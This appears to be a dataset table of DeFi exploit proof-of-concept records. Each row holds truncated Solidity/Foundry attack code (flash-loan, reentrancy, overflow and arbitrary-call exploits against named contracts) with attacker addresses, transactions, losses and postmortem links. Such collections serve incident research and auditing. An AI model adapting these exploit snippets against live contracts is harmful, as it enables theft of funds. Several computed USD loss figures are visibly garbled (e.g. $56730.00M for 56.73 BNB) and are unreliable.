source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 56.73 BNB
// Attacker : https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c
// Attack Contract : https://bscscan.com/address/0x2a011580f1b1533006967bd6dc6... | exploit_poc | AIRWA | 2025-04 | AIRWA_exp.sol | null | 063836f0bc407397 | 2026-01-07T10:59:16.545010 | postmortems | bsc | null | ~ 56.73 BNB | 56,730,000,000 | https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c | https://bscscan.com/address/0x2a011580f1b1533006967bd6dc63af7ae5c82363 | https://bscscan.com/address/0x3af7da38c9f68df9549ce1980eef4ac6b635223a | https://bscscan.com/tx/0x5cf050cba486ec48100d5e5ad716380660e8c984d80f73ba888415bb540851a4 | null | https://x.com/TenArmorAlert/status/1908086092772900909 | true | true | false | critical | ~ 56.73 BNB | unknown | function testExploit() public {
emit log_named_decimal_uint("BNB balance before attack", attacker.balance, 18);
vm.startPrank(attacker);
AttackContract attackContract = new AttackContract{value: 0.1 ether}();
attackContract.attack();
vm.stopPrank();
emit log_named_decimal... | true | ~ 56.73 BNB | https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c | https://bscscan.com/address/0x2a011580f1b1533006967bd6dc63af7ae5c82363 | https://bscscan.com/address/0x3af7da38c9f68df9549ce1980eef4ac6b635223a | https://bscscan.com/tx/0x5cf050cba486ec48100d5e5ad716380660e8c984d80f73ba888415bb540851a4 | https://x.com/TenArmorAlert/status/1908086092772900909 | $56730.00M | 7.97 | medium | AIRWA Exploit (2025-04) | true | true | true | false | |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 777k USD
// Attacker : 0x8149f77504007450711023cf0ec11bdd6348401f
// Attack Contract :
// Vulnerable Contract :
// Attack Tx : https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8c... | exploit_poc | Roar | 2025-04 | Roar_exp.sol | null | 2f3dc3ac1b33cfae | 2026-01-07T10:59:16.545064 | postmortems | unknown | 22,278,564 | 777k USD | 777,000 | null | null | null | https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8cec4ba16e88aed30c202d70c661 | https://x.com/CertiKAlert/status/1912430535999189042 | https://x.com/CertiKAlert/status/1912430535999189042 | true | true | false | high | 777k USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0xb0415D55f2C87b7f99285848bd341C367FeAc1ea).balanceOf(attacker), 18);
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x13028E6b95520ad16898396667d1e52cB5E550Ac).balanceOf(attack... | true | 777k USD | https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8cec4ba16e88aed30c202d70c661 | https://x.com/CertiKAlert/status/1912430535999189042 | https://x.com/CertiKAlert/status/1912430535999189042 | $777.0K | 6.9 | medium | Roar Exploit (2025-04) | true | false | true | true | |||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 1.5K USD
// Attacker : https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4
// Attack Contract : https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578
// Vulnerable Contract... | exploit_poc | Laundromat | 2025-04 | Laundromat_exp.sol | null | 9b9c6c3420756576 | 2026-01-07T10:59:16.545121 | postmortems | ethereum | 22,222,687 | 1.5K USD | 1,500 | https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4 | https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578 | https://etherscan.io/address/0x934cbbe5377358e6712b5f041d90313d935c501c | https://app.blocksec.com/explorer/tx/eth/0x08ffb5f7ab6421720ab609b6ab0ff5622fba225ba351119c21ef92c78cb8302c | https://x.com/TenArmorAlert/status/1909814943290884596 | https://x.com/TenArmorAlert/status/1909814943290884596 | true | true | false | low | 1.5K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of attacker", addr... | true | 1.5K USD | https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4 | https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578 | https://etherscan.io/address/0x934cbbe5377358e6712b5f041d90313d935c501c | https://app.blocksec.com/explorer/tx/eth/0x08ffb5f7ab6421720ab609b6ab0ff5622fba225ba351119c21ef92c78cb8302c | https://x.com/TenArmorAlert/status/1909814943290884596 | https://x.com/TenArmorAlert/status/1909814943290884596 | $1.5K | 8.28 | high | Laundromat Exploit (2025-04) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 318.9 k
// Attacker : https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52
// Attack Contract1 : https://optimistic.etherscan.io/address/0x4e25... | exploit_poc | Moonhacker | 2024-12 | Moonhacker_exp.sol | flash_loan | 16409cd09aeb4155 | 2026-01-07T10:59:16.545193 | postmortems | ethereum | null | 318.9 k | 318,900 | https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52 | null | https://optimistic.etherscan.io/address/0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847 | https://optimistic.etherscan.io/tx/0xd12016b25d7aef681ade3dc3c9d1a1cc12f35b2c99953ff0e0ee23a59454c4fe | https://blog.solidityscan.com/moonhacker-vault-hack-analysis-ab122cb226f6 | https://x.com/quillaudits_ai/status/1871607695700296041 | true | true | true | high | 318.9 k | flash-loan | function testExploit() public balanceLog {
Attacker attacker = new Attacker();
attacker.attack();
attacker.getProfit();
}
}
contract Attacker {
IAaveFlashloan aaveV3 = IAaveFlashloan(0x794a61358D6845594F94dc1DB02A252b5b4814aD);
IMusdc mUSDC = IMusdc(0x8E08617b0d66359D73Aa11E11017834... | true | 318.9 k | https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52 | https://optimistic.etherscan.io/address/0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847 | https://optimistic.etherscan.io/tx/0xd12016b25d7aef681ade3dc3c9d1a1cc12f35b2c99953ff0e0ee23a59454c4fe | https://blog.solidityscan.com/moonhacker-vault-hack-analysis-ab122cb226f6 | https://x.com/quillaudits_ai/status/1871607695700296041 | $318.9K | 10 | high | Moonhacker Exploit (2024-12) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 15K
// Attacker : https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390
// Attack Contract : https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c
// Vulnerable Contra... | exploit_poc | Pledge | 2024-12 | Pledge_exp.sol | null | c7d853e0c4086503 | 2026-01-07T10:59:16.545254 | postmortems | bsc | null | 15K | 15,000 | https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390 | https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c | https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1 | https://bscscan.com/tx/0x63ac9bc4e53dbcfaac3a65cb90917531cfdb1c79c0a334dda3f06e42373ff3a0 | null | null | true | true | false | medium | 15K | unknown | function testExploit() public balanceLog {
uint256 amount = IERC20(MFT).balanceOf(pledge);
address _target = address(this);
IPledge(pledge).swapTokenU(amount, _target);
} | true | 15K | https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390 | https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c | https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1 | https://bscscan.com/tx/0x63ac9bc4e53dbcfaac3a65cb90917531cfdb1c79c0a334dda3f06e42373ff3a0 | $15.0K | 6.77 | medium | Pledge Exploit (2024-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 4,953 USDT + 0.76 WBTC ($85.7K)
// Attacker : https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163
// Attack Contract : https://polygonscan.com/addres... | exploit_poc | BTC24H | 2024-12 | BTC24H_exp.sol | null | 37d7e68ad9d36f83 | 2026-01-07T10:59:16.545300 | postmortems | polygon | null | ~ 4,953 USDT + 0.76 WBTC ($85.7K) | 4 | https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163 | https://polygonscan.com/address/0x3cb2452c615007b9ef94d5814765eb48b71ae520 | https://polygonscan.com/address/0x968e1c984a431f3d0299563f15d48c395f70f719 | https://polygonscan.com/tx/0x554c9e4067e3bc0201ba06fc2cfeeacd178d7dd9c69f9b211bc661bb11296fde | null | https://x.com/TenArmorAlert/status/1868845296945426760 | true | true | false | low | ~ 4,953 USDT + 0.76 WBTC ($85.7K) | unknown | function testExploit() public {
address attacker = 0xDE0A99Fb39E78eFd3529e31D78434f7645601163;
emit log_named_decimal_uint("[Before] USDT", TokenHelper.getTokenBalance(USDT_ADDR, attacker), 6);
emit log_named_decimal_uint("[Before] WBTC", TokenHelper.getTokenBalance(WBTC, attacker), 8);
... | true | ~ 4,953 USDT + 0.76 WBTC ($85.7K) | https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163 | https://polygonscan.com/address/0x3cb2452c615007b9ef94d5814765eb48b71ae520 | https://polygonscan.com/address/0x968e1c984a431f3d0299563f15d48c395f70f719 | https://polygonscan.com/tx/0x554c9e4067e3bc0201ba06fc2cfeeacd178d7dd9c69f9b211bc661bb11296fde | https://x.com/TenArmorAlert/status/1868845296945426760 | $4 | 8.26 | high | BTC24H Exploit (2024-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import '../interface.sol';
// @KeyInfo - Total Lost : 15.7k USD
// Attacker : https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d
// Attack Contract : https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf... | exploit_poc | Bizness | 2024-12 | Bizness_exp.sol | reentrancy | 18fbb819c13768b8 | 2026-01-07T10:59:16.545351 | postmortems | base | null | 15.7k USD | 15,700 | https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d | https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf1550a9a0e557b5 | https://basescan.org/address/0xd6a7cfa86a41b8f40b8dfeb987582a479eb10693 | https://basescan.org/tx/0x984cb29cdb4e92e5899e9c94768f8a34047d0e1074f9c4109364e3682e488873 | null | https://x.com/TenArmorAlert/status/1872857132363645205 | true | true | true | medium | 15.7k USD | reentrancy | function testExploit() public balanceLog {
ILocker locker = ILocker(LOCKER);
Lock memory lockBefore = locker.locks(lockId);
console.log("lockBefore.amount ", lockBefore.amount);
// Step 1: Split the lock to trigger reentrancy
uint256 newSplitId = locker.splitLock{value: 0.011 et... | true | 15.7k USD | https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d | https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf1550a9a0e557b5 | https://basescan.org/address/0xd6a7cfa86a41b8f40b8dfeb987582a479eb10693 | https://basescan.org/tx/0x984cb29cdb4e92e5899e9c94768f8a34047d0e1074f9c4109364e3682e488873 | https://x.com/TenArmorAlert/status/1872857132363645205 | $15.7K | 8.51 | high | Bizness Exploit (2024-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 3k USD
// Attacker : https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
// Attack Contract : https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e89... | exploit_poc | SlurpyCoin | 2024-12 | SlurpyCoin_exp.sol | flash_loan | c9a528c2977ab011 | 2026-01-07T10:59:16.545398 | postmortems | bsc | null | 3k USD | 3,000 | https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138 | https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e8965e5a2349 | https://bscscan.com/address/0x72c114A1A4abC65BE2Be3E356eEde296Dbb8ba4c | https://bscscan.com/tx/0x6c729ee778332244de099ba0cb68808fcd7be4a667303fcdf2f54dd4b3d29051 | null | https://x.com/CertiKAlert/status/1869580379675590731 | true | true | true | low | 3k USD | flash-loan | function testExploit() public balanceLog {
// Step 1: borrow 40 WBNB from DODO
IDodo(DODO_ADDR).flashLoan(40 ether, 0, address(this), hex"00");
} | true | 3k USD | https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138 | https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e8965e5a2349 | https://bscscan.com/address/0x72c114A1A4abC65BE2Be3E356eEde296Dbb8ba4c | https://bscscan.com/tx/0x6c729ee778332244de099ba0cb68808fcd7be4a667303fcdf2f54dd4b3d29051 | https://x.com/CertiKAlert/status/1869580379675590731 | $3.0K | 9.64 | high | SlurpyCoin Exploit (2024-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ $501 K US$ (133.7 WETH)
// Attacker : https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025
// Attack Contract : https://basescan.org/address/0x32Fb1BedD9... | exploit_poc | CloberDEX | 2024-12 | CloberDEX_exp.sol | flash_loan | 1400dec5e6f04467 | 2026-01-07T10:59:16.545459 | postmortems | base | null | ~ $501 K US$ (133.7 WETH) | 501,000 | https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025 | https://basescan.org/address/0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1 | https://basescan.org/address/0x6A0b87D6b74F7D5C92722F6a11714DBeDa9F3895 | https://basescan.org/tx/0x8fcdfcded45100437ff94801090355f2f689941dca75de9a702e01670f361c04 | null | null | true | true | true | high | ~ $501 K US$ (133.7 WETH) | flash-loan | function testRealAttacker() public {
emit log_named_decimal_uint("The Real Attacker's ETH before the attack:", address(attacker).balance / 1e18, 0);
vm.createSelectFork("base", blocknumToForkFrom + 1);
emit log_named_decimal_uint("The Real Attacker's ETH after the attack:", address(attacker).bal... | true | ~ $501 K US$ (133.7 WETH) | https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025 | https://basescan.org/address/0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1 | https://basescan.org/address/0x6A0b87D6b74F7D5C92722F6a11714DBeDa9F3895 | https://basescan.org/tx/0x8fcdfcded45100437ff94801090355f2f689941dca75de9a702e01670f361c04 | $501.0K | 10 | high | CloberDEX Exploit (2024-12) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 17.4 BNB (~ $12,048)
// Attacker : https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b
// Attack Contract : https://bscscan.com/address/0x2ff0cc42e51353... | exploit_poc | LABUBU | 2024-12 | LABUBU_exp.sol | null | 38c47d7bebea3db9 | 2026-01-07T10:59:16.545535 | postmortems | bsc | 44,751,945 | 17.4 BNB (~ $12,048) | 17,400,000,000 | https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b | https://bscscan.com/address/0x2ff0cc42e513535bd56be20c3e686a58608260ca | https://bscscan.com/address/0x2ff960f1d9af1a6368c2866f79080c1e0b253997#code | https://bscscan.com/tx/0xb06df371029456f2bf2d2edb732d1f3c8292d4271d362390961fdcc63a2382de | null | https://x.com/TenArmorAlert/status/1866481066610958431 | true | true | false | critical | 17.4 BNB (~ $12,048) | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
attC.attack();
emit log_named_decimal_uint("Profit in BNB", attacker.balance, 18);
vm.stopPrank();
}
}
contract AttackerC {
address public immutable owner;
constructor() {
... | true | 17.4 BNB (~ $12,048) | https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b | https://bscscan.com/address/0x2ff0cc42e513535bd56be20c3e686a58608260ca | https://bscscan.com/address/0x2ff960f1d9af1a6368c2866f79080c1e0b253997#code | https://bscscan.com/tx/0xb06df371029456f2bf2d2edb732d1f3c8292d4271d362390961fdcc63a2382de | https://x.com/TenArmorAlert/status/1866481066610958431 | $17400.00M | 8.41 | high | LABUBU Exploit (2024-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 11k USD
// Attacker : https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d
// Attack Contract : https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50f... | exploit_poc | JHY | 2024-12 | JHY_exp.sol | null | 6791f708796f249c | 2026-01-07T10:59:16.545601 | postmortems | bsc | null | 11k USD | 11,000 | https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d | https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50fac8bdc1a55 | https://bscscan.com/address/0x40Cd735D49e43212B5cb0b19773Ec2A648aAA96c | https://bscscan.com/tx/0xb6a9055e3ce7f006391760fbbcc4e4bc8df8228dc47a8bb4ff657370ccc49256 | null | https://x.com/TenArmorAlert/status/1867950089156575317 | true | true | false | medium | 11k USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
AttackContract1 attackContract1 = new AttackContract1();
attackContract1.attack();
}
}
contract AttackContract1 {
address public attacker;
constructor() {
attacker = msg.sender;
} | true | 11k USD | https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d | https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50fac8bdc1a55 | https://bscscan.com/address/0x40Cd735D49e43212B5cb0b19773Ec2A648aAA96c | https://bscscan.com/tx/0xb6a9055e3ce7f006391760fbbcc4e4bc8df8228dc47a8bb4ff657370ccc49256 | https://x.com/TenArmorAlert/status/1867950089156575317 | $11.0K | 8.86 | high | JHY Exploit (2024-12) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface BECToken {
function balanceOf(
address account
) external view returns (uint256);
functio... | exploit_poc | BEC | 2018-04 | BEC_exp.sol | null | 6fd293f1e1c467d0 | 2026-01-07T10:59:16.545655 | postmortems | ethereum | 5,483,642 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("Before Exploit, Attacker1 BEC Balance", bec.balanceOf(attacker1), 18);
emit log_named_decimal_uint("Before Exploit, Attacker2 BEC Balance", bec.balanceOf(attacker2), 18);
address[] memory receivers = new address[](2);
receiver... | true | Unknown | 2.84 | low | BEC Exploit (2018-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : 140M
// Attacker : https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e
// Vulnerable Contract : https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081
// Attack Tx ... | exploit_poc | SmartMesh | 2018-04 | SmartMesh_exp.sol | null | dc006fab9fca668b | 2026-01-07T10:59:16.545696 | postmortems | ethereum | null | 140M | 140,000,000 | https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e | null | https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081 | https://etherscan.io/tx/0x1abab4c8db9a30e703114528e31dee129a3a758f7f8abc3b6494aad3d304e43f | https://cryptojobslist.com/blog/two-vulnerable-erc20-contracts-deep-dive-beautychain-smartmesh | null | true | true | false | critical | 140M | unknown | function testExploit() public balanceLog {
address _from = 0xDF31A499A5A8358b74564f1e2214B31bB34Eb46F;
address _to = 0xDF31A499A5A8358b74564f1e2214B31bB34Eb46F;
uint256 _value = uint256(0x8fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
uint256 _feeSmt = uint256(0x70000... | true | 140M | https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e | https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081 | https://etherscan.io/tx/0x1abab4c8db9a30e703114528e31dee129a3a758f7f8abc3b6494aad3d304e43f | https://cryptojobslist.com/blog/two-vulnerable-erc20-contracts-deep-dive-beautychain-smartmesh | $140.00M | 7.09 | medium | SmartMesh Exploit (2018-04) | true | true | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : around 20 million DAI.
// Attacker : 0xbac8a476b95ec741e56561a66231f92bc88bb3a8
// AttackContract : 0x2b0b02ce19c322b4dd55a3949b4fb6e9377f7913#code
// Attack TX: https:/... | exploit_poc | Pickle | 2020-11 | Pickle_exp.sol | null | 946d7bd20228980e | 2026-01-07T10:59:16.545749 | postmortems | ethereum | 11,303,122 | around 20 million DAI. | 20,000,000 | null | null | null | https://etherscan.io/tx/0xe72d4e7ba9b5af0cf2a8cfb1e30fd9f388df0ab3da79790be842bfbed11087b0 | null | null | true | false | false | critical | around 20 million DAI. | unknown | function testExploit() public {
uint256 earns = 5;
address[] memory targets = new address[](earns + 2);
bytes[] memory datas = new bytes[](earns + 2);
for (uint256 i = 0; i < earns + 2; i++) {
targets[i] = address(CURVE_LOGIC);
}
datas[0] = arbitraryCall(STRA... | true | around 20 million DAI. | $20.00M | 7.53 | medium | Pickle Exploit (2020-11) | true | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~36,044 US$
// Attacker : 0xee0221d76504aec40f63ad7e36855eebf5ea5edd
// Attack Contract : 0xc30808d9373093fbfcec9e026457c6a9dab706a7
// Vulnerable Contract : 0x34bd6dba4... | exploit_poc | EGD_Finance | 2022-08 | EGD_Finance_exp.sol | flash_loan | 76f23fb6faca071b | 2026-01-07T10:59:16.545807 | postmortems | bsc | 20,245,522 | ~36,044 US$ | 36 | null | null | null | https://bscscan.com/tx/0x50da0b1b6e34bce59769157df769eb45fa11efc7d0e292900d6b0a86ae66a2b3 | null | null | true | true | true | low | ~36,044 US$ | flash-loan | function testExploit() public {
Exploit exploit = new Exploit();
console.log("-------------------- Pre-work, stake 100 USDT to EGD Finance --------------------");
console.log("Tx: 0x4a66d01a017158ff38d6a88db98ba78435c606be57ca6df36033db4d9514f9f8");
console.log("Attacker Stake 100 USDT... | true | ~36,044 US$ | https://bscscan.com/tx/0x50da0b1b6e34bce59769157df769eb45fa11efc7d0e292900d6b0a86ae66a2b3 | $36 | 9 | high | EGD_Finance Exploit (2022-08) | true | false | true | false | |||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~3074 USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0x72321a3b50bb68ac3b46b0ab973b0e87b6c48ab73d23c4ba2cb73527f978d995
// Attacker : https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b16... | exploit_poc | EtnProduct | 2022-08 | EtnProduct_exp.sol | flash_loan | 89baf6378ac8102d | 2026-01-07T10:59:16.545867 | postmortems | bsc | 20,147,974 | ~3074 USD | 3,074 | https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b1601e | https://bscscan.com/address/0x178bf96e303fb31aef1b586271a63acd33e4eaf7 | null | null | null | null | true | false | true | low | ~3074 USD | flash-loan | false | https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b1601e | https://bscscan.com/address/0x178bf96e303fb31aef1b586271a63acd33e4eaf7 | $3.1K | 4.96 | low | EtnProduct Exploit (2022-08) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/AnciliaInc/status/1557846766682140672
// @Contract address
// https://bscscan.com/address/0xa4f5d4afd6b9226b3004dd276a9f778eb75f2e9e#code
contract ContractTest... | exploit_poc | ANCH | 2022-08 | ANCH_exp.sol | flash_loan | 3cab9284c277846c | 2026-01-07T10:59:16.545914 | postmortems | bsc | 20,302,534 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
ANCH.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(0, 50_000 * 1e18, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf... | true | Unknown | 4.18 | low | ANCH Exploit (2022-08) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
//import "./../interface.sol";
interface CheatCodes {
function createSelectFork(string calldata, uint256) external returns (uint256);
}
interface IERC20 {
function balanceOf(
address owner
) external view returns (uint256);
function approv... | exploit_poc | DDC | 2022-08 | DDC_exp.sol | null | 5b2edaf9ad7e6276 | 2026-01-07T10:59:16.545960 | postmortems | unknown | 20,840,079 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.47 | low | DDC Exploit (2022-08) | false | false | false | false | ||||||||
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
/*
Attacker: 0x3392c91403f09ad3b7e7243dbd4441436c7f443c
Attack tx: https://etherscan.io/tx/0x804ff3801542bff435a5d733f4d8a93a535d73d0de0f843fd979756a7eab26af
poc refers to: https://github.com/0xNezha/luckyHack
*/
i... | exploit_poc | LuckyTiger | 2022-08 | LuckyTiger_exp.sol | null | ea4a3374aa48e473 | 2026-01-07T10:59:16.546003 | postmortems | ethereum | 15,403,430 | null | null | null | null | null | https://etherscan.io/tx/0x804ff3801542bff435a5d733f4d8a93a535d73d0de0f843fd979756a7eab26af | null | null | false | false | false | medium | null | unknown | function testExploit() public {
vm.warp(1_661_351_167);
console.log("getRandom", getRandom());
uint256 amount = 10;
if (uint256(keccak256(abi.encodePacked(block.difficulty, block.timestamp))) % 2 == 0) {
revert("Not lucky");
}
bytes memory data = abi.encodeW... | true | Unknown | 4.02 | low | LuckyTiger Exploit (2022-08) | false | false | true | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~6.8 BNB
// TX : https://app.blocksec.com/explorer/tx/bsc/0x16be4fe1c8fcab578fcb999cbc40885ba0d4ba9f3782a67bd215fb56dc579062
// Attacker : https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb24... | exploit_poc | Qixi | 2022-08 | Qixi_exp.sol | null | b71792bd12984393 | 2026-01-07T10:59:16.546045 | postmortems | bsc | 20,120,884 | ~6.8 BNB | 6,800,000,000 | https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb249f | https://bscscan.com/address/0xb7b0fe129fefa222efd4eb1f6bef9de339339bbb | null | null | null | null | true | false | false | critical | ~6.8 BNB | unknown | false | https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb249f | https://bscscan.com/address/0xb7b0fe129fefa222efd4eb1f6bef9de339339bbb | $6800.00M | 2.71 | low | Qixi Exploit (2022-08) | true | false | false | false | ||||||
